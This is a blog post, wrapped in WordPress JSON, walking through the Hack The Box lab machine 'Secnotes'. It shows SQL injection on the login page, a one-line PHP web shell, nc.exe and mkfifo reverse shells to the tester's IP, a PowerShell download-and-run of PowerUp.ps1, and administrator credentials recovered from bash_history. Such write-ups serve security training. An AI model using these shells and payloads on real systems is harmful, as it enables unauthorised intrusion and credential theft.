{"id":237,"date":"2020-05-31T07:29:41","date_gmt":"2020-05-31T07:29:41","guid":{"rendered":"https:\/\/shreyapohekar.com\/blogs\/?p=237"},"modified":"2020-06-08T16:48:16","modified_gmt":"2020-06-08T16:48:16","slug":"secnotes-hackthebox-walkthrough","status":"publish","type":"post","link":"https:\/\/shreyapohekar.com\/blogs\/secnotes-hackthebox-walkthrough\/","title":{"rendered":"Secnotes : Hackthebox walkthrough"},"content":{"rendered":"\n

Hey everyone! This is shreya and the blog post covers the step by step guide to pwn secnotes from hackthebox.<\/p>\n\n\n\n

Secnotes is a medium windows machine. Initial foothold on the box is based on exploiting the sqli on the login page where we get the creds to access smb share. Since we have read.write access on the share, we will be exploiting it to get a shell with user. The privilege escalation to root requires a bit of recon to find the .exe that is run bash on windows. Once inside the bash terminal, viewing the bash_history will give the creds for administrator.<\/p>\n\n\n\n

Enough of spoilers!! Now, lets get started.<\/p>\n\n\n\n

Starting with nmap scan, I found a few open ports<\/p>\n\n\n\n

# nmap -sC -sV -o secnotes.nmap 10.10.10.97

\nNmap scan report for 10.10.10.97
\nHost is up (0.68s latency).
\nNot shown: 998 filtered ports
\nPORT\tSTATE SERVICE \tVERSION
\n80\/tcp open http \tMicrosoft IIS httpd 10.0
\n| http-methods:
\n|_ Potentially risky methods: TRACE
\n|_http-server-header: Microsoft-IIS\/10.0
\n| http-title: Secure Notes – Login
\n|_Requested resource was login.php
\n445\/tcp open microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
\nService Info: Host: SECNOTES; OS: Windows; CPE: cpe:\/o:microsoft:windows
\n\nHost script results:
\n|_clock-skew: mean: 2h23m58s, deviation: 4h02m32s, median: 3m56s
\n| smb-os-discovery:
\n| OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)
\n| OS CPE: cpe:\/o:microsoft:windows_10::-
\n| Computer name: SECNOTES
\n| NetBIOS computer name: SECNOTES\\x00
\n| Workgroup: HTB\\x00
\n|_ System time: 2020-05-27T02:10:17-07:00
\n| smb-security-mode:
\n| account_used: guest
\n| authentication_level: user
\n| challenge_response: supported
\n|_ message_signing: disabled (dangerous, but default)
\n| smb2-security-mode:
\n| 2.02:
\n|_\tMessage signing enabled but not required
\n| smb2-time:
\n| date: 2020-05-27 14:40:15
\n|_ start_date: N\/A
\n<\/p>\n\n\n\n

I have a habit to always run a full port scan while i do some manual enumeration. And this time, I found one.<\/p>\n\n\n\n

# nmap -p- -sS -sV -A -T4 -vv 10.10.10.97 -o fullport.nmap

\n8808\/tcp open http \tsyn-ack ttl 127 Microsoft IIS httpd 10.0
\n| http-methods:
\n| Supported Methods: OPTIONS TRACE GET HEAD POST
\n|_ Potentially risky methods: TRACE
\n|_http-server-header: Microsoft-IIS\/10.0
\n|_http-title: IIS Windows
\n<\/p>\n\n\n\n

I tried accessing smb as guest, but access was denied.
\nMoving further, we have 2 ports with http up and running.
\nSo lets checkout port 8808<\/p>\n\n\n\n

<\/p>\n\n\n\n

I was merely a page having nothing userful.<\/p>\n\n\n\n

Initial Foothold<\/h2>\n\n\n\n

Moving to port 80, Login.php landed. It also had the option to sign up. So i quickly followed the link and registered an user<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

Upon logging in, home.php landed<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

Please contact tyler@secnotes.htb implied that the probable user name is tyler. Also, it was clearly visible that the user\u2019s name is been reflected on the site therefore a sqli might be possible.<\/p>\n\n\n\n

There was contact.php to send messages to tyler.<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

As I said earlier, login.php was vulnerable to sqli, with payload \u2018 or \u20181\u2019=\u20191
\nSo I registered the user with this payload and same password as the user.<\/p>\n\n\n\n

<\/p>\n\n\n\n

Upon logging in with \u2018 or \u20181\u2019=\u20191, the page displayed all the notes created by all the users on the box. A few of them were notes by tyler where creds were present.<\/p>\n\n\n\n

\\\\secnotes.htb\\new-site
\ntyler \/ 92g!mA8BGjOirkL%OG*&<\/p>\n\n\n\n

<\/p>\n\n\n\n

# smbclient \\\\\\\\10.10.10.97\\\\new-site -U tyler<\/pre>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
The contents seemed to be the one that was hosted on port 8808. That implies that the site is hosted with contents of smb share. Having write access on the machine means that now i can upload a shell through smb.<\/p>\n\n\n\n
I uploaded a basic php shell and nc.exe to get a reverse shell.<\/p>\n\n\n\n
<?php echo system($_REQUEST['cmd']); ?><\/pre>\n\n\n\n
Getting the user.txt<\/h2>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Executing whoami gave the username. Ie we\u2019ll be getting a user shell.<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
So i opened up a nc listener and ran the basic one liner for reverse shell from pentest monkey<\/a><\/p>\n\n\n\n
http:\/\/secnotes.htb:8808\/cmd.php?cmd=nc.exe%2010.10.14.7%209001%20-e%20cmd.exe<\/a><\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
So we r now tyler. Lets grab the user.txt<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Privilege escalation to Administrator<\/h2>\n\n\n\n
Up next, I downloaded PowerUp.ps1 to enumerate for any loophole and ran Invoke-AllChecks<\/p>\n\n\n\n
# powershell
\n# IEX (New-Object Net.WebClient).DownloadString(\u2018http:\/\/10.10.14.7\/PoweUp.ps1\u2019)<\/pre>\n\n\n\n
<\/p>\n\n\n\n
Setup python server on the local machine to grab the file<\/p>\n\n\n\n
# python -m SimpleHTTPServer<\/pre>\n\n\n\n
On windows box run,<\/p>\n\n\n\n
# Invoke-AllChecks<\/pre>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
Running Invoke-AllChecks didn’t return anything juicy, so I started off with manual enumeration.<\/p>\n\n\n\n
Inside tyler\u2019s desktop folder, I found different lnk files. One of them was bash.lnk.<\/p>\n\n\n\n
That means that bash is present on the box, so i grabbed for the contents of bash.lnk and found the path to bash.exe<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
I cd into the specified file, but bash.exe didnt existed there. This was something weird.<\/p>\n\n\n\n
Then i thought of doing a recursive search for a file (bash.exe) using powershell inside the directory C:\\Windows.<\/p>\n\n\n\n
> Get-ChildItem -Path C:\\Windows -Filter bash.exe -Recurse -ErrorAction SilentlyContinue -Force<\/pre>\n\n\n\n
And got a weird directory<\/p>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
I went to that directory and entered a simple one liner bash reverse shell from pentest monkey and spawned up a nc listener on the local machine.<\/p>\n\n\n\n
>  .\\bash.exe -c \"rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2>&1|nc 10.10.14.7 8888 >\/tmp\/f\"<\/pre>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
And got root!!<\/p>\n\n\n\n
But it is not the administrator. So i started to go through the contents. And I found .bash_history. In a hope to find something interesting, I listed its contents. And guess what, there were smb creds set for administrator!!<\/p>\n\n\n\n
# cd \/root
\n# ls -la
\ntotal 8
\ndrwx—— 1 root root  512 Jun 22  2018 .
\ndrwxr-xr-x 1 root root  512 Jun 21  2018 ..
\n———- 1 root root  398 Jun 22  2018 .bash_history
\n-rw-r–r– 1 root root 3112 Jun 22  2018 .bashrc
\n-rw-r–r– 1 root root  148 Aug 17  2015 .profile
\ndrwxrwxrwx 1 root root  512 Jun 22  2018 filesystem

\n# cat .bash_history
\ncd \/mnt\/c\/
\nls
\ncd Users\/
\ncd \/
\ncd ~
\nls
\npwd
\nmkdir filesystem
\nmount \/\/127.0.0.1\/c$ filesystem\/
\nsudo apt install cifs-utils
\nmount \/\/127.0.0.1\/c$ filesystem\/
\nmount \/\/127.0.0.1\/c$ filesystem\/ -o user=administrator
\ncat \/proc\/filesystems
\nsudo modprobe cifs
\nsmbclient
\napt install smbclient
\nsmbclient
\nsmbclient -U ‘administrator%u6!4ZwgwOM#^OBf#Nwnh’ \\\\\\\\127.0.0.1\\\\c$
\n> .bash_history
\nless .bash_history
\nexit#
\n<\/p>\n\n\n\n
The password for administrator is u6!4ZwgwOM#^OBf#Nwnh<\/p>\n\n\n\n
Lets try the psexec.py from Impacket<\/a> to get login as administrator.<\/p>\n\n\n\n
# psexec.py administrator@10.10.10.97<\/pre>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
We are now administrator. <\/p>\n\n\n\n
Thats all for the blog post. If you enjoyed reading, do like the post!<\/p>\n\n\n\n
For more hackthebox writeups, visit here<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
Hey everyone! This is shreya and the blog post covers the step by step guide to pwn secnotes from hackthebox. Secnotes is a medium windows machine. Initial foothold on the box is based on exploiting the sqli on the login page where we get the creds to access smb share. Since we have read.write access […]<\/p>\n","protected":false},"author":1,"featured_media":246,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ocean_post_layout":"","ocean_both_sidebars_style":"","ocean_both_sidebars_content_width":0,"ocean_both_sidebars_sidebars_width":0,"ocean_sidebar":"","ocean_second_sidebar":"","ocean_disable_margins":"enable","ocean_add_body_class":"","ocean_shortcode_before_top_bar":"","ocean_shortcode_after_top_bar":"","ocean_shortcode_before_header":"","ocean_shortcode_after_header":"","ocean_has_shortcode":"","ocean_shortcode_after_title":"","ocean_shortcode_before_footer_widgets":"","ocean_shortcode_after_footer_widgets":"","ocean_shortcode_before_footer_bottom":"","ocean_shortcode_after_footer_bottom":"","ocean_display_top_bar":"default","ocean_display_header":"default","ocean_header_style":"","ocean_center_header_left_menu":"","ocean_custom_header_template":"","ocean_custom_logo":0,"ocean_custom_retina_logo":0,"ocean_custom_logo_max_width":0,"ocean_custom_logo_tablet_max_width":0,"ocean_custom_logo_mobile_max_width":0,"ocean_custom_logo_max_height":0,"ocean_custom_logo_tablet_max_height":0,"ocean_custom_logo_mobile_max_height":0,"ocean_header_custom_menu":"","ocean_menu_typo_font_family":"","ocean_menu_typo_font_subset":"","ocean_menu_typo_font_size":0,"ocean_menu_typo_font_size_tablet":0,"ocean_menu_typo_font_size_mobile":0,"ocean_menu_typo_font_size_unit":"px","ocean_menu_typo_font_weight":"","ocean_menu_typo_font_weight_tablet":"","ocean_menu_typo_font_weight_mobile":"","ocean_menu_typo_transform":"","ocean_menu_typo_transform_tablet":"","ocean_menu_typo_transform_mobile":"","ocean_menu_typo_line_height":0,"ocean_menu_typo_line_height_tablet":0,"ocean_menu_typo_line_height_mobile":0,"ocean_menu_typo_line_height_unit":"","ocean_menu_typo_spacing":0,"ocean_menu_typo_spacing_tablet":0,"ocean_menu_typo_spacing_mobile":0,"ocean_menu_typo_spacing_unit":"","ocean_menu_link_color":"","ocean_menu_link_color_hover":"","ocean_menu_link_color_active":"","ocean_menu_link_background":"","ocean_menu_link_hover_background":"","ocean_menu_link_active_background":"","ocean_menu_social_links_bg":"","ocean_menu_social_hover_links_bg":"","ocean_menu_social_links_color":"","ocean_menu_social_hover_links_color":"","ocean_disable_title":"default","ocean_disable_heading":"default","ocean_post_title":"","ocean_post_subheading":"","ocean_post_title_style":"","ocean_post_title_background_color":"","ocean_post_title_background":0,"ocean_post_title_bg_image_position":"","ocean_post_title_bg_image_attachment":"","ocean_post_title_bg_image_repeat":"","ocean_post_title_bg_image_size":"","ocean_post_title_height":0,"ocean_post_title_bg_overlay":0.5,"ocean_post_title_bg_overlay_color":"","ocean_disable_breadcrumbs":"default","ocean_breadcrumbs_color":"","ocean_breadcrumbs_separator_color":"","ocean_breadcrumbs_links_color":"","ocean_breadcrumbs_links_hover_color":"","ocean_display_footer_widgets":"default","ocean_display_footer_bottom":"default","ocean_custom_footer_template":"","ocean_post_oembed":"","ocean_post_self_hosted_media":"","ocean_post_video_embed":"","ocean_link_format":"","ocean_link_format_target":"self","ocean_quote_format":"","ocean_quote_format_link":"post","ocean_gallery_link_images":"on","ocean_gallery_id":[],"footnotes":""},"categories":[19,2,109],"tags":[112,111,102,26,108,100,101,110,114,103,113,9,107,104,53,106],"class_list":["post-237","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hackthebox","category-information-security","category-windows","tag-bash-in-windows","tag-bash-exe","tag-hacking","tag-hackthebox","tag-information-security","tag-infosec","tag-pentest","tag-read-teaming","tag-samba-share","tag-secnotes-hackthebox","tag-smb","tag-sql-injection","tag-sqli","tag-walkthrough","tag-windows-pentest","tag-writeup","entry","has-media"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/237"}],"collection":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/comments?post=237"}],"version-history":[{"count":10,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/237\/revisions"}],"predecessor-version":[{"id":282,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/237\/revisions\/282"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media\/246"}],"wp:attachment":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media?parent=237"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/categories?post=237"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/tags?post=237"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}